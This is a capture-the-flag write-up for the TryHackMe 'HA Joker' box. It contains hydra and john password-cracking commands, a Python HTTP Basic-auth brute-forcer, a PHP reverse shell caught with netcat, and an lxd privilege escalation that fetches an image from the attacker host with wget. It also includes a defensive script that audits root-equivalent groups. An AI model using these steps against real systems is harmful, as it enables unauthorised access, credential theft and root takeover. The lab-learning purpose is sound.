Tryhackme HA Joker CTF Writeup

Hakan Altun
5 min read · Feb 28, 2021

Let’s start with an nmap scan (-sC for default scripts, -sV for version detection, -vv for verbose output):

Command: nmap -vv -sCV 10.10.185.86

PORT     STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL89x6yGLD8uQ9HgFK1nvBGpjT6KJXIwZZ56/pjgdRK/dOSpvl0ckMaa68V9bLHvn0Oerh2oa4Q5yCnwddrQnm7JHJ4gNAM+lg+ML7+cIULAHqXFKPpPAjvEWJ7T6+NRrLc9q8EixBsbEPuNer4tGGyUJXg6GpjWL5jZ79TwZ80ANcYPVGPZbrcCfx5yR/1KBTcpEdUsounHjpnpDS/i+2rJ3ua8IPUrqcY3GzlDcvF7d/+oO9GxQ0wjpy1po6lDJ/LytU6IPFZ1Gn/xpRsOxw0N35S7fDuhn69XlXj8xiDDbTlOhD4sNxckX0veXKpo6ynQh5t3yM5CxAQdqRKgFF
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOzF9YUxQxzgUVsmwq9ZtROK9XiPOB0quHBIwbMQPScfnLbF3/Fws+Ffm/l0NV7aIua0W7FLGP3U4cxZEDFIzfQ=
| 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLWfYB8/GSsvhS7b9c6hpXJCO6p1RvLsv4RJMvN4B3r
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open http syn-ack Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s run a directory scan against the HTTP service on port 80.

Command: gobuster dir -u http://10.10.185.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.185.86
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
2021/02/28 14:35:22 Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/secret.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/02/28 14:55:59 Finished
===============================================================

Let’s take a look at the “secret.txt” file we found.

It is a conversation between Joker and Batman. The names themselves are the useful part: they are candidate usernames for the HTTP Basic authentication prompt on port 8080.

Now let’s look at the other HTTP service, on port 8080.

The 401 response with `Basic realm=Please enter the password.` means the site is protected by HTTP Basic authentication. Basic auth only base64-encodes `user:password` and there is no lockout, so we can brute-force it with hydra’s http-get module using the username we just found (-f stops at the first valid pair, -s sets the port):

Command: hydra -l joker -P /home/hakanbey/Desktop/rockyou.txt -f 10.10.185.86 -s 8080 http-get

Yes we found the password. We can now log in.
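What hydra’s http-get module does here, as an added example that is not part of the original writeup: probe the URL, read the Basic realm out of the 401’s WWW-Authenticate header, then send `Authorization: Basic base64(user:password)` for each candidate and stop at the first response that is not a 401. To run offline it stands up its own tiny Basic-auth server on localhost; the realm string is the one nmap showed, the valid password (`example-pass`) and the wordlist are made up and are not the box’s.

```python
import base64
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed stand-in for the port-8080 vhost: one valid credential (placeholder, not the real one).
REALM = "Please enter the password."
VALID_USER, VALID_PASSWORD = "joker", "example-pass"


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Answers 200 for the one valid Authorization header, 401 + challenge for everything else."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{VALID_USER}:{VALID_PASSWORD}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"ok")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the fake target on a free localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


def challenge_realm(url):
    """Unauthenticated probe: the realm from a Basic challenge, or None if there is no such challenge."""
    try:
        urlopen(url, timeout=5)
    except HTTPError as err:
        hdr = err.headers.get("WWW-Authenticate", "")
        m = re.match(r'Basic\s+realm="?([^"]*)"?', hdr, re.I)  # nmap printed the realm unquoted
        return m.group(1) if m else None
    return None


def try_login(url, user, password):
    """Send one Basic-auth attempt and return the HTTP status code."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def brute_force(url, user, wordlist):
    """Return the first password that does not get a 401 (hydra's stop-on-first-hit behaviour), else None."""
    for password in wordlist:
        if try_login(url, user, password) != 401:
            return password
    return None


if __name__ == "__main__":
    server, base_url = start_server()
    try:
        print("realm:", challenge_realm(base_url))
        print("hit:", brute_force(base_url, "joker", ["123456", "password", "example-pass", "batman"]))
    finally:
        server.shutdown()
```

Against a real target, replace `base_url` with `http://10.10.185.86:8080/` and `wordlist` with rockyou; the status-code rule is the same one hydra applies, so a 403 or a redirect would also count as a hit and should be inspected by hand.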

We need another directory scan, but this vhost answers 401 without credentials, so we pass the username and password to gobuster with -U and -P, and point it at port 8080 this time.

Command: gobuster dir -U joker -P ha**** -u http://10.10.185.86:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.185.86:8080
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Auth User: joker
[+] Timeout: 10s
===============================================================
2021/02/28 15:14:28 Starting gobuster
===============================================================
/images (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README (Status: 200)
/components (Status: 301)
/modules (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/robots (Status: 200)
/templates (Status: 301)
/tmp (Status: 301)
/LICENSE (Status: 200)
/layouts (Status: 301)
/backup (Status: 200)
/administrator (Status: 301)
/htaccess (Status: 200)
/cli (Status: 301)
===============================================================
2021/02/28 15:17:31 Finished
===============================================================

Download the file named “backup”. It is a password-protected zip archive (john identifies it as PKZIP below), so we cannot simply unzip it.

We can crack the password of the zip file using the “zip2john” and “john” tools.

Command: /usr/sbin/zip2john backup > hash

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ha**** (backup)
1g 0:00:00:00 DONE (2021-02-28 15:25) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s 123456..henrik
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the password cracked, we can extract the archive.

Command: unzip backup

The archive contains two directories, “db” and “site”. Inside “db” is a database dump, “joomladb.sql”. Rather than reading the whole dump, grep it for the users table.

Command: grep users joomladb.sql

`INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y******************************',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;

We now have the admin user’s password from the database dump, but it is a bcrypt hash, not an encrypted value: there is nothing to decrypt, only to guess. The `$2y$10$` prefix is PHP’s bcrypt variant with cost 10, i.e. 2^10 = 1024 rounds, which matches the iteration count john reports below. Save the hash to a file (hash2, in `admin:$2y$10$...` form) and crack it with john.
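The step the writeup skips is turning the SQL line into the hash2 file. The following is an added example, not code from the original post: it parses MySQL-dump `INSERT INTO ... VALUES (...)` rows (single-quoted strings, backslash and doubled-quote escapes, several rows per statement), picks the bcrypt column by pattern rather than position, emits john’s `user:hash` lines, and decodes the cost field into the round count john prints. The sample dump is constructed to mirror the page’s line; its hash is a made-up placeholder, not the real one.

```python
import re

# Full bcrypt string: $2a$/$2b$/$2x$/$2y$, two-digit cost, 22-char salt + 31-char digest (53 chars).
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")

# One-line INSERT into any <prefix>_users table (Joomla's user table is named that way).
INSERT_RE = re.compile(r"INSERT INTO `(\w+_users)` VALUES (.*?);$", re.M)

# Constructed sample: same column layout as the page's cc1gr_users row, placeholder hash.
SAMPLE_HASH = "$2y$10$abcdefghijklmnopqrstuv0123456789012345678901234567890"
SAMPLE_DUMP = (
    "/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;\n"
    "INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','"
    + SAMPLE_HASH
    + "',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0',"
    "'{\\\"admin_style\\\":\\\"\\\",\\\"language\\\":\\\"\\\"}','0000-00-00 00:00:00',0,'','',0);\n"
    "/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;\n"
)


def parse_rows(values_text):
    """Split the text after VALUES into rows of string fields, honouring MySQL quoting.

    Handles backslash escapes (\\' and \\") and doubled quotes ('') inside strings,
    and several (...) tuples in one statement. Unquoted tokens (numbers, NULL) come back as text.
    """
    rows, fields, cur = [], [], []
    in_str = in_row = False
    i, n = 0, len(values_text)
    while i < n:
        c = values_text[i]
        if in_str:
            if c == "\\" and i + 1 < n:          # backslash escape: keep the next char literally
                cur.append(values_text[i + 1])
                i += 2
                continue
            if c == "'":
                if i + 1 < n and values_text[i + 1] == "'":  # '' inside a string is a literal quote
                    cur.append("'")
                    i += 2
                    continue
                in_str = False                   # closing quote
            else:
                cur.append(c)
        elif c == "'":
            in_str = True
        elif c == "(" and not in_row:
            in_row, fields, cur = True, [], []
        elif c == ")" and in_row:
            fields.append("".join(cur))
            rows.append(fields)
            in_row = False
        elif c == "," and in_row:
            fields.append("".join(cur))
            cur = []
        elif in_row and not c.isspace():
            cur.append(c)
        i += 1
    return rows


def extract_hashes(dump_text, username_col=2):
    """Return (username, bcrypt_hash) pairs from every *_users INSERT in the dump.

    The hash column is located by pattern, so a different column order still works;
    the username is Joomla's third column unless told otherwise.
    """
    found = []
    for m in INSERT_RE.finditer(dump_text):
        for row in parse_rows(m.group(2)):
            hashes = [f for f in row if BCRYPT_RE.match(f)]
            if hashes and len(row) > username_col:
                found.append((row[username_col], hashes[0]))
    return found


def bcrypt_cost(hash_str):
    """(cost, rounds) for a bcrypt string: cost 10 means 2**10 = 1024 rounds, as john reports."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash: " + hash_str)
    cost = int(m.group(1))
    return cost, 2 ** cost


def john_lines(pairs):
    """Lines for a john input file; john reads $2y$ hashes directly, no prefix rewrite needed."""
    return [f"{user}:{h}" for user, h in pairs]


if __name__ == "__main__":
    pairs = extract_hashes(SAMPLE_DUMP)
    for line in john_lines(pairs):
        print(line)  # redirect into hash2, then: john -w=rockyou.txt hash2
    print("cost, rounds:", bcrypt_cost(pairs[0][1]))
```

On the real dump, call `extract_hashes(open("joomladb.sql").read())` and write the lines to hash2; with a full Joomla user table this yields one line per account, which is worth more than grepping a single row by hand.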

Command: john -w=/home/hakanbey/Desktop/rockyou.txt hash2

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ab****** (?)
1g 0:00:00:03 DONE (2021-02-28 15:32) 0.2985g/s 306.2p/s 306.2c/s 306.2C/s 87654321..kucing
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have the admin password. Log in at the Joomla administrator panel that gobuster found earlier (/administrator).

We are in. To get a shell, go to Extensions > Templates > Templates in the top menu, open the “Beez3” template and edit “error.php” from the file list on the left. Replace its contents with a PHP reverse shell pointing at our listener (attacker IP 10.9.45.10, port 4444 below) and save.

Start a netcat listener, then trigger the reverse shell by requesting the edited template file directly.

Command: nc -lvp 4444

Trigger: browse to http://10.10.185.86:8080/templates/beez3/error.php

10.10.185.86: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.185.86] 37476
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:44:32 up 47 min, 0 users, load average: 0.00, 0.20, 3.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$

Upgrade the shell to a PTY with Python and set TERM so that interactive programs behave:

Command: python3 -c 'import pty;pty.spawn("/bin/bash")'

Command: export TERM=xterm

www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
www-data@ubuntu:/$

Now we can escalate privileges. The `id` output shows that www-data is a member of the lxd group. That group is effectively root: any member can talk to the LXD socket, start a privileged container and mount the host’s filesystem into it, so we only need an image to launch.

First, on our own machine, build a minimal Alpine image (the build script must run as root) and serve it over HTTP:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
python -m SimpleHTTPServer

Then, on the target, fetch the image, import it, create a privileged container with the host root mounted at /mnt/root, and exec a shell in it:

cd /tmp
wget http://10.9.45.10:8000/alpine-v3.10-x86_64-20191008_1227.tar.gz
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

If `lxc init` complains that no storage pool exists, LXD has never been initialised on the host; `lxd init --auto` creates a default pool and is allowed for lxd group members.

Inside the container we are root, and because the container is privileged the host’s filesystem is mounted writable at /mnt/root, so we can read the flag (and, if we wanted persistence, /mnt/root/etc/shadow or an SSH key drop would be just as reachable).

Command: cat /mnt/root/root/final.txt
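The root cause on this box is a service account (www-data, no login shell) sitting in a root-equivalent group. As an added example, not part of the original writeup, the script below is the check a defender or auditor would run: it parses /etc/passwd and /etc/group text, reports every user whose primary or supplementary group is root-equivalent (lxd, docker, disk, shadow, sudo, wheel), flags service accounts separately, and also pulls the same information straight out of an `id` line like the one on this page. The passwd and group contents are constructed samples, not the box’s files.

```python
import re

# Groups whose membership is effectively root on a typical Linux host, with the reason.
ROOT_EQUIVALENT_GROUPS = {
    "lxd": "can start a privileged container with / mounted inside it",
    "docker": "can start a privileged container with / mounted inside it",
    "disk": "raw read/write access to block devices, including the root filesystem",
    "shadow": "can read password hashes from /etc/shadow",
    "sudo": "sudo rights (check sudoers for the exact scope)",
    "wheel": "sudo rights (check sudoers for the exact scope)",
}

NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")

# Constructed samples modelled on the box: www-data (uid 33, nologin) is in lxd.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
joker:x:1000:1000:joker,,,:/home/joker:/bin/bash
"""
SAMPLE_GROUP = """root:x:0:
sudo:x:27:joker
www-data:x:33:
lxd:x:115:www-data,joker
joker:x:1000:
"""


def parse_passwd(text):
    """name -> (uid, gid, shell) from /etc/passwd-style text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        users[name] = (int(uid), int(gid), shell)
    return users


def parse_group(text):
    """name -> (gid, set of supplementary members) from /etc/group-style text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def is_service_account(uid, shell):
    """System accounts (uid < 1000) or accounts with no login shell should never hold such groups."""
    return uid < 1000 or shell in NOLOGIN_SHELLS


def find_dangerous_memberships(passwd_text, group_text):
    """Sorted (user, group, is_service_account) triples for every user in a root-equivalent
    group, whether through the primary gid or a supplementary membership."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _members) in groups.items()}
    findings = set()
    for user, (uid, gid, shell) in users.items():
        member_of = {name for name, (_gid, members) in groups.items() if user in members}
        if gid in gid_to_name:
            member_of.add(gid_to_name[gid])
        for group in member_of & set(ROOT_EQUIVALENT_GROUPS):
            findings.add((user, group, is_service_account(uid, shell)))
    return sorted(findings)


ID_GROUP_RE = re.compile(r"\d+\(([^)]+)\)")


def dangerous_groups_from_id(id_output):
    """Root-equivalent groups named in the output of `id` (e.g. the www-data line on this page)."""
    groups_part = id_output.split("groups=", 1)[1] if "groups=" in id_output else ""
    return [g for g in ID_GROUP_RE.findall(groups_part) if g in ROOT_EQUIVALENT_GROUPS]


if __name__ == "__main__":
    for user, group, service in find_dangerous_memberships(SAMPLE_PASSWD, SAMPLE_GROUP):
        tag = "SERVICE ACCOUNT" if service else "user"
        print(f"{user} ({tag}) in {group}: {ROOT_EQUIVALENT_GROUPS[group]}")
    print(dangerous_groups_from_id("uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)"))
```

On a live host, feed it `open("/etc/passwd").read()` and `open("/etc/group").read()`; the fix for this box is simply `gpasswd -d www-data lxd`, and the same check catches the docker and disk variants of the same mistake.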

Thank you for reading and solving
